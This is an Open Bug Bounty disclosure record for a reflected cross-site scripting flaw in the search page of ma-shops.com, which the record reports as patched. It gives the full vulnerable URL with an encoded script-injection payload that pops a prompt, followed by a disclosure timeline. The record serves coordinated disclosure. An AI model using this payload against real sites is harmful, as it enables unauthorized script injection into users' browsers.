ma-shops.com XSS vulnerability

2017-11-24T02:28:00
ID OBB:429641
Type openbugbounty
Reporter deb_security
Modified 2017-12-24T21:41:00

Description

Vulnerable URL:
https://www.ma-shops.com/shops/search.php?searchstr=%22%3E%3Csvg%3E%3Cscript%3E/%3C@/%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3EFOREIGN+COINAGES+Q+to+Z++1277-1293H&catid;=977〈=en
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 202280
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 November, 2017 02:28 GMT
Generic security notifications sent to website owner| 24 November, 2017 02:31 GMT
Notification sent to subscribers (without technical details)| 24 November, 2017 06:17 GMT
Vulnerability details disclosed by researcher| 24 December, 2017 03:27 GMT
Vulnerability patched by the website owner| 24 December, 2017 21:41 GMT